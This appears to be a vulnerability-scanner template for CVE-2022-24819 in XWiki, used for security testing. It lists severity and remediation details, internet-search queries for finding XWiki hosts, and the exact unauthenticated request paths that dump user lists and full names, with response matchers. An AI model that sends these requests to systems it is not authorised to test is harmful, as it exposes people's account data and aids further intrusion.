id: CVE-2022-24819

info:
  name: XWiki < 12.10.11, 13.4.4 & 13.9-rc-1 - Information Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    An unauthenticated user can retrieve a list of users and their full names through a publicly accessible URL in XWiki. The issue affects versions before 12.10.11, 13.4.4, and 13.9-rc-1.
  impact: |
    Information disclosure could lead to unauthorized access to sensitive data.
  remediation: |
    Upgrade XWiki to the latest version to mitigate CVE-2022-24819.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-97jg-43c9-q6pf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-24819
    cwe-id: CWE-359
    epss-score: 0.04317
    epss-percentile: 0.8908
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2022,xwiki,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki=&media=json"
      - "{{BaseURL}}/xwiki/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki=&media=json"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "value\":", "label\":", "icon\":")'
          - 'contains_all(body, "<results>", "<rs id=", "icon=\"")'
        condition: or

      - type: dsl
        dsl:
          - 'contains_any(content_type, "application/json", "text/xml")'
          - "status_code == 401 || status_code_2 == 200"
        condition: and
# digest: 4a0a004730450221008eb62a343319686eb68cbf4f066664a6e8e0829974535fd9017576b632197e1b02206869c21bc5c76029653c56cd588f733c7059a7fe9506e9f5624a2b393691b56b:922c64590222798bb761d5b6d8e72950